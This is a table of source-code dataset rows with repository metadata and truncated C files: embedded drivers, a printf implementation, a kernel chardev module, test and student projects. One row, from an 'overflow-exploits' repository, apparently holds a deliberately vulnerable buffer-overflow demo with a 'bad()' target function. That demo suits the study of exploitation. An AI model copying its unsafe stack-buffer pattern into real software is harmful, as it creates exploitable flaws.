blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 268 | content_id stringlengths 40 40 | detected_licenses listlengths 0 58 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 816
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.31k 677M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 151
values | src_encoding stringclasses 33
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 3 10.3M | extension stringclasses 119
values | content stringlengths 3 10.3M | authors listlengths 1 1 | author_id stringlengths 0 228 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
028f45005b5d8c60cd12f5b5b23adc5f11140a13 | 6c38ac6dd3b89bdbf1e704962bd69d0b023b1f6f | /Lib/piefreespace/piefreespace.h | 80ebd41403e7ba8d234307271fcb7bc477e844ef | [] | no_license | kbigdelysh/FreePIE-HTCVive-Custom-Controller | 1b26c1f3394f54989b5217d1bfe86fe60e75f2f2 | 2c7c4c1d31a928850d3b89c62d69c1f8baee936a | refs/heads/master | 2020-03-27T14:27:43.817592 | 2018-10-25T22:37:15 | 2018-10-25T22:37:15 | 146,663,682 | 3 | 0 | null | null | null | null | UTF-8 | C | false | false | 826 | h | /*
Author: Brant Lewis (brantlew@yahoo.com) - July 2012
piefreespace (PFS) is a proxy dll that is used to translate complex freespacelib
calls into a simple API for easy linking by the FreePIE FreeSpacePlugin. It sets up
the device connection, handles I/O reads, and converts quaternion vectors into
Euler angles. T... | [
"kamran@zerokey.com"
] | kamran@zerokey.com |
c308d480f67844bbf127891f2ef9b097eec03167 | 418dbf22e807402a123f036dc92c7a5bcab8d8d2 | /GD50/project/ET06D02/cosmic/Srcstm8/MODS/LIBF/cprint.c | 13fcbfe169db48925bc4f55e1e8460e21f2069d1 | [] | no_license | quanhengwen/workspace | 6f8eaf28c80d6af373c7b32bb395b660eb8eadd2 | 3285851eefaca894fa2d97e3740c76bf7b7dbb7e | refs/heads/master | 2022-01-05T08:03:30.309751 | 2018-09-25T02:48:51 | 2018-09-25T02:48:51 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 6,645 | c | /* FORMATTED PRINT
* Copyright (c) 1995 by COSMIC Software
*/
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#define DBUF 24
#define DEFPREC 6
#define ALTFORM 1
#define BLANK 2
#define DFLTPR 4
#define RJUST 8
#define SIGN 16
#define MODH 32
#define MODL 64
#define OXP 128
#define INTNO 0
#def... | [
"wangkang@etdoor.com.cn"
] | wangkang@etdoor.com.cn |
8288246171166109b452217261870597c5034961 | 952057aa1880c771fe01c36391a99d64e17f466e | /src/state_philo.c | b2843bc52fb7bf844a2ab6d49dfa5ef8f2c83b5f | [] | no_license | LOF0/philosopher | 41caf1458265950bc11d142802d968610e073a97 | 540a4ef61867c0e60de685f9b1ff34b29351262c | refs/heads/master | 2020-03-15T20:54:18.594041 | 2018-05-06T14:11:36 | 2018-05-06T14:11:36 | 132,343,517 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,973 | c | /*
** EPITECH PROJECT, 2018
** philosopher
** File description:
** state_philo.c
*/
#include "philosopher.h"
#include "extern.h"
void prev_sleep(philosopher_t *philosoph)
{
philosoph->status = REST;
lphilo_sleep();
philosoph->redirect = THINK;
}
void wait_mutex_to_eat(philosopher_t *m_philo, philosopher_t *philo... | [
"yaniss.pheron@epitech.eu"
] | yaniss.pheron@epitech.eu |
fd490e7bdf74dc45b42be722d41254fa260d9af1 | 572ee982ccbfe3e1d5f25e65224d6561a23efbee | /src/with-aslr.c | fe9397988e16ce81d8d187fd0a7c5ab1e8f135dc | [] | no_license | udoprog/overflow-exploits | bfcc9990e3a1e2006355ed85da8abae19f13fdef | 94649c96e7119d4d65497ae811d467e796b6b887 | refs/heads/master | 2023-06-19T22:41:57.002676 | 2018-01-19T22:00:19 | 2018-01-19T22:00:19 | 117,869,182 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,049 | c | #include <string.h>
#include <stdlib.h>
#include <stdio.h>
void __attribute__ ((noinline)) bad();
void __attribute__ ((noinline)) foo();
void bad() {
printf("Oh no :(\n");
exit(0);
}
void helper(const char* buffer) {
printf("Everything is reversed :): %s\n", buffer);
}
void foo() {
char buffer[64];
... | [
"udoprog@tedro.se"
] | udoprog@tedro.se |
fc934beea482e7543c44f619615f11774288952e | dd3ac9dc05ae1253dffd15eb7dfa178ad36c6bdd | /src/drivers/kinetis/gpio/pins.h | da7153d659708c868d8fb7e2683472fc05e1668f | [
"MIT"
] | permissive | RenaKunisaki/micron | 4601772ebf96c4182c34869971918e14f3fa3f3e | 08a17aca0a5ad52cd08a7c8716ba6f9f0b814070 | refs/heads/master | 2023-05-13T15:05:22.408072 | 2021-06-03T00:32:02 | 2021-06-03T00:32:02 | 365,632,499 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 12,410 | h | //Functions, macros, and definitions relating to Teensy GPIO pins.
//Much of this is copied from the original Teensy libraries and then reorganized
//and added on to.
#ifndef _MICRON_PINS_H_
#define _MICRON_PINS_H_
#ifdef __cplusplus
extern "C" {
#endif
#define PIN_DIR_INPUT 0
#define PIN_DIR_OUTPUT 1
#include "pi... | [
"hyperhacker@gmail.com"
] | hyperhacker@gmail.com |
42417a8906a02d15a916fadd2209ab54c62ed037 | 2e395ab976e04bde26e92004b615433a00121c90 | /tree/IRTree/Expressions/Eseq.h | 891bcccf84beec2199a63cd533ed294af517a7e0 | [] | no_license | kkvadrat289/Compilers | 1070f0d16c6fff18fc5ede68696d6269c1be6b83 | 2f5e6d79b7f62e4147ce68e1128f89ffc9b83878 | refs/heads/master | 2021-09-16T17:14:03.719943 | 2018-06-22T09:46:07 | 2018-06-22T09:46:07 | 104,876,904 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 48 | h | #ifndef ESEQ_H
#define ESEQ_H
#endif // ESEQ_H
| [
"kkvadrat289@yandex.ru"
] | kkvadrat289@yandex.ru |
5355a526f3636e5abaa7acbcf17b1cc60fc7ce77 | 3f2632c37bbf0c299853827ad161e75168addf23 | /IHTrafficFramework/IHTrafficFramework/Macros/IHTLog.h | e98520896efb5b689ce73cfca45acf9000fcd41c | [
"MIT"
] | permissive | wayde191/iHTraffic | 2aaa00a2611afaa72d4835492a20be5b5ae12796 | f9fa5b9c28ade822bca577ab66c1a5c160d4e567 | refs/heads/master | 2021-01-18T21:19:20.815837 | 2016-04-17T02:00:05 | 2016-04-17T02:00:05 | 41,707,815 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 467 | h | //
// IHTLog.h
// IHTrafficFramework
//
// Created by Wayde Sun on 5/1/15.
// Copyright (c) 2015 iHakula. All rights reserved.
//
#ifndef IHTrafficFramework_IHTLog_h
#define IHTrafficFramework_IHTLog_h
#define IHTLOGPRINT(xx, ...) NSLog(@"%s(%d): " xx, __PRETTY_FUNCTION__, __LINE__, ##__VA_ARGS__)
#if IHT_APP_P... | [
"wwsun@thoughtworks.com"
] | wwsun@thoughtworks.com |
a256557ff777a4057023e9312b8ed208a1d0ebbb | 5e849711763f64b8bfe3e61ae823cd1832dbc527 | /Vizeye Yönelik Alıştırma/srcs/basamakSayisiKadarYildiz.c | fb99432d7d643c6fa814aa769610384c9bc5f873 | [] | no_license | ardasdasdas/BBTK-CPP-Dersleri | ad74b68016186b7529ca1c6b760fe2cb5e558bea | 3359b3c793f370a9a9f8f4ace9b89825fabbef55 | refs/heads/master | 2020-11-25T13:20:39.784358 | 2020-02-02T12:50:56 | 2020-02-02T12:50:56 | 228,683,189 | 5 | 1 | null | null | null | null | UTF-8 | C | false | false | 443 | c | #include<stdio.h>
#include<math.h>
int main()
{
int sayi, basamakSayisi = 0, bosEleman;
printf("Sayi girin: ");
scanf_s("%d", &sayi);
bosEleman = sayi;
while (bosEleman > 0)
{
bosEleman /= 10;
basamakSayisi++;
}
int x;
for (int i = basamakSayisi; i > 0; i--)
{
x = sayi / pow(10, (i - 1));
for (int ... | [
"152120171007@ogrenci.ogu.edu.tr"
] | 152120171007@ogrenci.ogu.edu.tr |
f7407f4dbd51aef9bfb324d43b4a79216bb4bbea | a55fcbe94032f98f8a858cebf7cfe843410aea76 | /hw4/env/include/python3.6m/bitset.h | 25d5fe3650ffb26e053e8c01f95fac08497ffbfc | [] | no_license | quentintruong/UCLA-ECE239AS-W19 | a3aca9302125ee7b85f8cecf82485782718d8266 | f734aa7a8178b64b309761f4a390ed4689c4caed | refs/heads/master | 2022-12-10T19:01:28.589101 | 2020-02-14T08:00:33 | 2020-02-14T08:00:33 | 166,895,199 | 1 | 0 | null | 2022-12-08T01:43:39 | 2019-01-21T23:34:01 | Jupyter Notebook | UTF-8 | C | false | false | 58 | h | /Users/quentintruong/anaconda3/include/python3.6m/bitset.h | [
"quentintruong@users.noreply.github.com"
] | quentintruong@users.noreply.github.com |
ca2ec1074db4ce6ae283c229d47363493e00adb3 | 7174be0acc084de34d0fea2400e074227d8c286b | /edk2/MdeModulePkg/Application/CapsuleApp/AppSupport.c | c359be187c8d0ec232b9068a3693b2a84238894f | [
"BSD-2-Clause"
] | permissive | ProgrammingInUEFI/FW | 73b0c8681867c3ed5629d9da7ee18abe4017d280 | d3505d4157b606ba86bab73a9f22725cd7cfa83f | refs/heads/master | 2021-06-30T17:26:10.250587 | 2017-09-21T10:06:16 | 2017-09-21T10:06:16 | 104,332,735 | 12 | 4 | null | null | null | null | UTF-8 | C | false | false | 11,061 | c | /** @file
A shell application that triggers capsule update process.
Copyright (c) 2016 - 2017, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials
are licensed and made available under the terms and conditions of the BSD License
which accompanies this distribution. The fu... | [
"captaindirk@yandex.ru"
] | captaindirk@yandex.ru |
a17d71636ef23516325b90d983d7f30b3ebd28d6 | 805533b7dc22151162bd64941e417cdc22ff1c78 | /1530 Number of good leaf nodes pairs.c | 4b95a5196a532251b5ad6d362022235b55e12fd2 | [] | no_license | akib-islam-coder/leetcodesolutions | 1fd5a5b9d26a147a4d078c596010e21e051b79bc | d31335b91f5bafd9819b42d4413265563424b7ad | refs/heads/master | 2023-07-08T14:21:09.107684 | 2021-08-17T13:31:36 | 2021-08-17T13:31:36 | 368,580,074 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,692 | c | /**
* Definition for a binary tree node.
* struct TreeNode {
* int val;
* struct TreeNode *left;
* struct TreeNode *right;
* };
*/
int total_count = 0;
int * count(struct TreeNode * root, int distance, int * arr_index)
{
if(root == NULL)
return;
int left_arr_index = 0;
int r... | [
"akibislam2021@gmail.com"
] | akibislam2021@gmail.com |
c54e1da95a4f7b8fc50429c0f268083825963d76 | e25c8b65c0115053b14f8ecffaea94a964eefa1f | /ds/open/world2/lichi_town_1/map_15_3.c | 5567b5c7fbdcee2423ce3b405df0bf935645b460 | [] | no_license | zwshen/mudos-game-ds | c985b4b64c586bdc7347bd95d97ab12e78a2f20f | 07ea84ebdff5ee49cb482a520bdf1aaeda886cd0 | refs/heads/master | 2022-03-01T14:55:10.537294 | 2022-02-15T15:41:26 | 2022-02-15T15:41:26 | 244,925,365 | 4 | 1 | null | 2022-02-15T15:41:27 | 2020-03-04T14:44:49 | C | BIG5 | C | false | false | 413 | c | inherit ROOM;
void create()
{
set("short", "黃梅公園");
set("long", @LONG
LONG
);
set("exits",([
"east" : __DIR__"map_15_4",
"south" : __DIR__"map_16_3",
"north" : __DIR__"map_14_3",
"west" : __DIR__"map_15_2",
]));
set("outdoors","land");
set("light",1);
setup();
set("map_long",1); //show ma... | [
"zwshen0603@gmail.com"
] | zwshen0603@gmail.com |
8e622671c89c630b065bab84e8efc5611adf507c | c26d7b0ed875357278e61627da2da0650da77986 | /src/games/sail/pl_1.c | 369b792688027ac59db6d0a27e41b9f85549383b | [
"BSD-3-Clause"
] | permissive | RetroBSD/retrobsd | 5343d9e3c424637fc3ad5b03fe720b2744490025 | 486f81f6abff01c7dcc207235cd2979b226a95ff | refs/heads/master | 2023-09-02T23:12:05.110883 | 2023-07-07T18:41:40 | 2023-07-07T18:41:40 | 18,598,087 | 282 | 59 | BSD-3-Clause | 2023-07-18T07:35:36 | 2014-04-09T13:25:46 | C | UTF-8 | C | false | false | 2,346 | c | /*
* Copyright (c) 1983 Regents of the University of California.
* All rights reserved. The Berkeley software License Agreement
* specifies the terms and conditions for redistribution.
*/
#include "player.h"
#include <sys/types.h>
#include <sys/wait.h>
/*
* If we get here before a ship is chosen, then ms == 0 an... | [
"matt@majenko.co.uk"
] | matt@majenko.co.uk |
de73f213be5306513cd5fc226537542e79d609bd | 37fe75adecd929513a943863f44c5039c6a54b0a | /inc/logger.h | cd0ebbf3e380d114b3b9a4c18dfd233f46ed15d3 | [
"Apache-2.0"
] | permissive | kolayuk/ActiveJack | 02c28c3e5247ac3f71d04bd09b1672656246f72e | b4ebf4273352b8f11b50035472cd0253f56016d0 | refs/heads/master | 2020-05-18T12:57:27.950694 | 2013-09-18T16:28:00 | 2013-09-18T16:28:00 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,051 | h | /*
* logger1.h
*
* Created on: 28.02.2010
* Author: SQR
*/
#ifndef __FILELOGGER_H__
#define __FILELOGGER_H__
#include <e32std.h>
#include <flogger.h>
#include <e32debug.h>
_LIT(KLogsDir,"ActiveJack");
_LIT(KLogsFileName,"log.txt");
#define _LOG(KTmpStr){RFileLogger::WriteFormat(KLogsDir(),KLog... | [
"kolayuk@gmail.com"
] | kolayuk@gmail.com |
3f41528802ed4f27fc1807b6aa645e817cb50594 | eaae3529ea65c9be62e4b177a498dd0459396052 | /modified_vars_ws/fqq11679_A_Digging_Problem.c | a87c41f05ec0c41c917d332751567754ba404966 | [] | no_license | mgsanusi/blame-dodger | badac55079b0bc84c1c3ddff9357caffd480b512 | c8b1f19d48e09200c9d59f3dda3b298ced7103d7 | refs/heads/master | 2021-01-20T04:50:14.975609 | 2018-01-12T00:02:14 | 2018-01-12T00:02:14 | 89,739,285 | 3 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,605 | c | #include <stdio.h>
long n;
long len;
long parent;
typedef struct {
long s;
long l;
long f;
long pre;
} EDGE;
EDGE fo[600000];
long y_st[555];
void insert(long t, long d)
{
parent++;
fo[parent].s = t;
fo[parent].l = d;
fo[parent].f = 1;
fo[parent].pre = y_st[t];
y_st[t] = parent;... | [
"marina@virginia.edu"
] | marina@virginia.edu |
e98b2d0f8f9ab5c640af3646e3d67f75cf8c1259 | 940207b3012dc4aa11473b79cb0822aafea21ffa | /program/csmith-correa/csmith-correa.c | c608a40cadd23d8b14967e788b5812dc0eefd1ca | [] | no_license | clappis/ck-benchmarks | b9f76a66a155605974e87172e07ee9ebd0586398 | cdfcd55bc80c1db3ed504169b020e6c240009d4e | refs/heads/master | 2020-05-24T18:59:00.269534 | 2019-10-18T14:10:10 | 2019-10-18T14:10:10 | 187,406,438 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,255 | c | /*
* This is a RANDOMLY GENERATED PROGRAM.
*
* Generator: csmith 2.3.0
* Git version: 30dccd7
* Options: (none)
* Seed: 3275458104
*/
#include "csmith.h"
static long __undefined;
/* --- Struct/Union Declarations --- */
/* --- GLOBAL VARIABLES --- */
static uint16_t g_2 = 1UL;
/* --- FORWARD DECLARAT... | [
"alanmeloclappis@gmail.com"
] | alanmeloclappis@gmail.com |
1f325d9fa1963946e5366f82fd86a67054d5bc15 | 382ee0d56fae954229fcb8b91ac48ab1b6196c0f | /minishell/src/parsing/parsing2.c | 6b201773cb159c291e251a0d048f39544cce518d | [] | no_license | dailynj/42seoul_Exam03-MiniShell | 3f4c75bd3f9f6588ed23fc2b12a0d297fa816ce6 | d7bc658be9212893f2bdd3cf353d1488703f7a89 | refs/heads/master | 2023-06-22T14:21:24.343935 | 2021-07-19T04:34:38 | 2021-07-19T04:34:38 | 383,329,739 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,807 | c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* parsing2.c :+: :+: :+: ... | [
"leena9901@gmail.com"
] | leena9901@gmail.com |
99961d1da29cf84d3f290ef883b8a72b3373abed | daffd7d3183b344829dd09f7f54eb4302b00af82 | /5case/chardev/chardev.c | a9e96709ba317cf6da59224c12ec34e5c0f92fc2 | [] | no_license | Goleusov/Eltex_courses | 1543a1fe1e7eb8e39b5cd8afbb56fd0932e8f587 | ed1615e66f05fb0c7e4fcb283f46e0b5b8836f4c | refs/heads/master | 2023-07-04T09:45:03.111829 | 2021-08-10T13:01:25 | 2021-08-10T13:01:25 | 394,546,087 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 5,949 | c | /*
* chardev.c: Создает символьное устройство, доступное только для чтения
* возвращает сообщение, с указанием количества произведенных попыток чтения из файла устройства
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <asm/uaccess.h> /* определение функции put_user */... | [
"goleysov77@mail.ru"
] | goleysov77@mail.ru |
688948eda54c6769f2031324b59236d6d66b247e | 43c96d96ff6b5ec8ee6a1b2909ef3d8ab2314670 | /x.3/p8/include/pinguino/core/digitalw.c | 84b55c8d77691518d1a9900ea173cf540d085b0a | [
"LicenseRef-scancode-other-permissive"
] | permissive | Josbaney/pinguino32 | 1c77b7ed47e7cd64a824665f5e09de28078a6efa | 8216a5974474ec268d0dc471c47503aa5b2dec6e | refs/heads/master | 2021-01-15T09:34:12.039081 | 2012-10-02T03:27:12 | 2012-10-02T03:27:12 | 47,172,583 | 1 | 0 | null | 2015-12-01T07:17:47 | 2015-12-01T07:17:44 | null | UTF-8 | C | false | false | 3,826 | c | // Digital Library for Pinguino
// jean-pierre MANDON 2008
// modification 2009/08/08 18F4550
// regis blanchot 2011/08/09 : FreeJALduino support
// regis blanchot 2012/02/14 : Pinguino 26J50 support
#ifndef __DIGITALW__
#define __DIGITALW__
#include <pic18fregs.h>
#include <typedef.h>
#define pB 0
#define pC 1
#def... | [
"rblanchot@gmail.com@b7319616-6d90-1ae0-72d7-295f6d5ed4f0"
] | rblanchot@gmail.com@b7319616-6d90-1ae0-72d7-295f6d5ed4f0 |
b77837171b2d055c0dda22950eec60c8c4fe3af9 | ad3bc509c4f61424492b2949e03c60628f631a31 | /test/encodings/unicode_group_Cf_x_encoding_policy_ignore.c | e7a939819353f8e6feea7676ac93152d1563d609 | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-public-domain"
] | permissive | sergeyklay/re2c | 0b1cdbfe40b4514be33320b2e1d263cf5d6426d6 | 88ff1e5a2ad57d424fe999e17960c564886d36f4 | refs/heads/master | 2021-12-23T22:24:30.716697 | 2021-06-26T22:56:00 | 2021-06-27T15:23:28 | 299,206,360 | 0 | 0 | NOASSERTION | 2021-06-19T10:49:05 | 2020-09-28T06:10:35 | C | UTF-8 | C | false | false | 3,474 | c | /* Generated by re2c */
#line 1 "encodings/unicode_group_Cf_x_encoding_policy_ignore.re"
// re2c $INPUT -o $OUTPUT -x --encoding-policy ignore
#include <stdio.h>
#include "utf16.h"
#define YYCTYPE unsigned short
bool scan(const YYCTYPE * start, const YYCTYPE * const limit)
{
__attribute__((unused)) const YYCTYPE * YYM... | [
"skvadrik@gmail.com"
] | skvadrik@gmail.com |
1508594af96b6f27b790fd1c4333cb77958323d8 | 035605243092f4e8422b57743ec8e21d3be63b97 | /src/checkprime.c | 1052db30e58323211b2a87b96071e7e2b5a02e93 | [] | no_license | Genesis99003167/Activity2 | 9d8ffcf394871da3fb479e76f3978e6a29c7bddb | 60bc124b8230e4a01e4160becf7f6f592cc969cf | refs/heads/main | 2023-01-24T08:49:03.844835 | 2020-12-03T19:19:43 | 2020-12-03T19:19:43 | 318,287,374 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 406 | c | #include <stdio.h>
#include <math.h>
#include "checkprime.h"
int checkprime(int n)
{
if(n <= 0 )
{
return -1;
}
if(n == 1)
{
return 3;
}
if(n > 1)
{
int i, flag = 1, squareRoot;
squareRoot = sqrt(n);
for (i = 2; i <= squareRoot; ++i) {
if (n % i == 0) {
... | [
"noreply@github.com"
] | Genesis99003167.noreply@github.com |
004070a088015930bb8aa4cf9c5606c8ee213da2 | c28b642708aa5d366d5ea035eb189d0a0a21f92c | /libft/ft_strrev.c | 0d5bb6542add93334ee3b2d9dbe5df144ce7fc79 | [] | no_license | eg0rmaffin/get_next_line | 781188542543a1c14131f4c444412d2c60a3a21f | 3c82465a1b8f51f7cd753a024c5224298c425d8f | refs/heads/master | 2020-07-31T16:05:32.632759 | 2019-09-25T22:22:38 | 2019-09-25T22:22:38 | 210,664,704 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,253 | c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_strrev.c :+: :+: :+: ... | [
"ckumera@mi-q3.21-school.ru"
] | ckumera@mi-q3.21-school.ru |
618273ea893fb0e3120ae1bf9b671e30bd213cb0 | b36f34b6a24d019d624d1cc74f5b29062eef2ba4 | /frameworks/cocos2d-x/external/android-specific/tremolo/Tremolo/treminfo.c | 4f7272869def3fd9978a9de5e5ff08637337d158 | [
"MIT"
] | permissive | zhongfq/cocos-lua | f49c1639f2c9a2a7678f9ed67e58114986ac882f | c2cf0f36ac0f0c91fb3456b555cacd8e8587be46 | refs/heads/main | 2023-08-17T17:13:05.705639 | 2023-08-17T06:06:36 | 2023-08-17T06:06:36 | 192,316,318 | 165 | 63 | MIT | 2023-08-14T23:59:30 | 2019-06-17T09:27:37 | C | UTF-8 | C | false | false | 11,793 | c | /************************************************************************
* Copyright (C) 2002-2009, Xiph.org Foundation
* Copyright (C) 2010, Robin Watts for Pinknoise Productions Ltd
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provi... | [
"codetypes@gmail.com"
] | codetypes@gmail.com |
4cb274186e7c1e63fd6cc0ce46fe6bacfdd4e9b8 | a25f07bf2514b9ce9ac670baf81603cf96f1a7dd | /robot/serial/serial.h | d0dbed54dbc3c8538fefecb6ab535c4dfae64c60 | [] | no_license | RutgersRoboticsResearch/Slam-Bot | 25bfcecefe983bd37bf741acaf736fbccd03d57b | 15749d08957c2b8a0dea7e1f229094cf13cd0ac0 | refs/heads/master | 2020-05-24T14:58:45.705174 | 2015-12-19T11:20:46 | 2015-12-19T11:20:46 | 28,452,368 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,487 | h | #ifndef __TK_SERIAL_H__
#define __TK_SERIAL_H__
#include <stdint.h>
#define SWBUFMAX 128
#define SWREADMAX 64
#define SWWRITEMAX 64
#ifdef __cplusplus
extern "C" {
#endif
typedef struct serial {
char *port;
int fd;
int8_t connected;
int baudrate;
int parity;
/* values */
char ... | [
"tyong_23@hotmail.com"
] | tyong_23@hotmail.com |
53f1d31b97598a466610f331ccfde3274329d5b3 | 4774b70885ef247380622e0bbdd4d86267626c1d | /src/data/graphics/mugshots.h | 84a90c25b4f87475076a5e83c544cffd985c680c | [] | no_license | KilluaK/pokemon-rjv | e6ce1f97ddf1dc8ccbad56973ec6b6ba37d511f8 | 01f2fa173a93119f263191b057758867a2ffac1f | refs/heads/master | 2023-07-04T07:20:37.068892 | 2021-08-01T20:34:14 | 2021-08-01T20:34:14 | 344,188,608 | 0 | 0 | null | 2021-07-13T15:36:26 | 2021-03-03T16:21:17 | C | UTF-8 | C | false | false | 861 | h | static const u32 smileyM[] = INCBIN_U32("graphics/mugshots/smiley/smiley.4bpp.lz");
static const u16 smileyMPal[] = INCBIN_U16("graphics/mugshots/smiley/smiley.gbapal");
static const u32 blehM[] = INCBIN_U32("graphics/mugshots/bleh/bleh.4bpp.lz");
static const u16 blehMPal[] = INCBIN_U16("graphics/mugshots/bleh/bleh.gb... | [
"lzeduardo64@gmail.com"
] | lzeduardo64@gmail.com |
b801458883843f41a4c462ed8bffd82704098316 | 7724af4ff88db478c746ace9863670bb44a9806d | /libft/ft_lstclear_bonus.c | f6a916d38981724c960fa33a03ff93f1466af519 | [] | no_license | rofernan42/Cub3D | 8659b67301a511acfb5677cfacb1907a44d3719a | 559f8adc97c2fd2889891b1d0709a380861e98fb | refs/heads/master | 2023-02-13T17:32:21.620588 | 2021-01-08T17:58:39 | 2021-01-08T17:58:39 | 225,924,251 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,088 | c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_lstclear_bonus.c :+: :+: :+: ... | [
"rofernan@e2r9p10.42.fr"
] | rofernan@e2r9p10.42.fr |
bfef3072bdb6517a8a5837fd7beabc1b6e51bdb0 | 2adb92d740c00024c6fc86bef1299d8007623cd2 | /roboscoop/roboscoop_lib/EIFGENs/roboscoop/W_code/C6/ar186.c | 8f64d8b59cb8f4e6df82e30a3c6b9ca747738c55 | [] | no_license | mafilipp/RPL_Ass1 | ac0a56a6129e0c92a8e71263eee44143fc26864e | 1a5f64b8fcc1b5c441e7affd08170867cb1e4d21 | refs/heads/master | 2021-03-12T19:44:12.586165 | 2014-10-04T08:33:40 | 2014-10-04T08:33:40 | 24,785,188 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,507 | c | /*
* Code for class ARRAYED_LIST_CURSOR
*/
#include "eif_eiffel.h"
#include "../E1/estructure.h"
#ifdef __cplusplus
extern "C" {
#endif
extern void F186_3746(EIF_REFERENCE, EIF_TYPED_VALUE);
extern EIF_TYPED_VALUE F186_3747(EIF_REFERENCE);
extern void EIF_Minit186(void);
#ifdef __cplusplus
}
#endif
#ifdef __cp... | [
"mpippo@bluewin.ch"
] | mpippo@bluewin.ch |
bac84bd5492374b80943f76c495f012caf75aef1 | b935db349664d610cb50c841cae0fd8f26971170 | /FourOperCalc.c | 72cbf8e1dac00ffbfe7b11df1addf3f570d01678 | [] | no_license | oleg8r/C_Repository | 967c736fddc8799d30f26ae790a4f4010570dd2e | 5bc2594b576eb6f5ca6a89107a0e87d5ff96e535 | refs/heads/master | 2023-07-04T16:42:49.375660 | 2021-08-10T21:01:52 | 2021-08-10T21:01:52 | 246,632,991 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,407 | c | /*===========================================================
|
| File Name: FourOperCalc.c
| Purpose: To calculate the result based on the operation and
| numbers chosen by the user.
| Documentation: Ask the user to choose an arithmetical operation
| type from the list and let the user enter two numbers.
| Ca... | [
"noreply@github.com"
] | oleg8r.noreply@github.com |
9fc87c2a4751abebac8566fabc522ff6a421f066 | 40a0374dbf9f5dd6035b8967454273698cb85f6f | /cextern/cfitsio/zutil.h | 1f5a6c0ef4e5dd124f27ed99909fa262cdfa1c50 | [
"CFITSIO",
"BSD-2-Clause"
] | permissive | spacetelescope/PyFITS | 3e8ba5ab807e4b94840490d88b3bbc2996db5d7e | e0c7604f35cb2222def581e3422c6f4833602f03 | refs/heads/master | 2021-01-01T16:30:32.789464 | 2017-12-18T19:53:45 | 2017-12-18T19:53:45 | 2,578,059 | 18 | 12 | BSD-3-Clause | 2017-12-18T19:53:46 | 2011-10-14T18:44:47 | Python | UTF-8 | C | false | false | 7,136 | h | /* zutil.h -- internal interface and configuration of the compression library
* Copyright (C) 1995-2010 Jean-loup Gailly.
* For conditions of distribution and use, see copyright notice in zlib.h
*/
/* WARNING: this file should *not* be used by applications. It is
part of the implementation of the compression lib... | [
"erik.m.bray@gmail.com"
] | erik.m.bray@gmail.com |
771fb963a985338e84261bbc32e3f45c9b7fe6cf | 55ce1c369c60e8a92f31b1e433291d2b6f2a196a | /node_modules/node/node_modules/node-darwin-x64/include/node/openssl/archs/VC-WIN64A/asm_avx2/include/openssl/configuration.h | 6a413341de258751382b3e4aea680d76ddbb9191 | [
"ICU",
"Autoconf-exception-generic",
"Artistic-2.0",
"LicenseRef-scancode-unicode",
"GPL-3.0-or-later",
"Zlib",
"MIT",
"NTP",
"LicenseRef-scancode-public-domain-disclaimer",
"GPL-1.0-or-later",
"NAIST-2003",
"LicenseRef-scancode-unknown-license-reference",
"CC0-1.0",
"GPL-2.0-or-later",
... | permissive | Annastasshia/Checkpoint | 95f772471f11d82bce92adc51a6a0608cb151cfd | 685f81a7e355f8bcc6979034cfee6902c105c324 | refs/heads/master | 2023-03-18T00:13:14.366242 | 2023-03-03T14:03:13 | 2023-03-03T14:03:13 | 261,604,908 | 0 | 2 | MIT | 2023-03-03T14:03:15 | 2020-05-05T23:25:11 | HTML | UTF-8 | C | false | false | 3,097 | h | /*
* WARNING: do not edit!
* Generated by makefile from include/openssl/configuration.h.in
*
* Copyright 2016-2021 The OpenSSL Project Authors. All Rights Reserved.
*
* Licensed under the Apache License 2.0 (the "License"). You may not use
* this file except in compliance with the License. You can obtain a cop... | [
"59664727+Annastasshia@users.noreply.github.com"
] | 59664727+Annastasshia@users.noreply.github.com |
405e064c080723bf94ee6a711a4e75da5f181e3d | a9ffb4f5551e047d123549b566c9d3abccbd91ea | /Server.c | 3c680b49af70c9bd2fa9f85050af3b78a4b8cb95 | [] | no_license | sourimd/TCPSocketProgramming | b2372cc1667a1f6979404dd4217a71b9dcd37ee7 | b0765012e72f50d8cc681051e744d61652c30d6f | refs/heads/master | 2016-09-05T16:20:09.330945 | 2015-03-13T22:20:25 | 2015-03-13T22:20:25 | 32,183,631 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 3,569 | c | /*
Steps:-
1. Create a Socket
2. Bind this socket with server's local address and a port
3. Listen for client connection requests over that socket
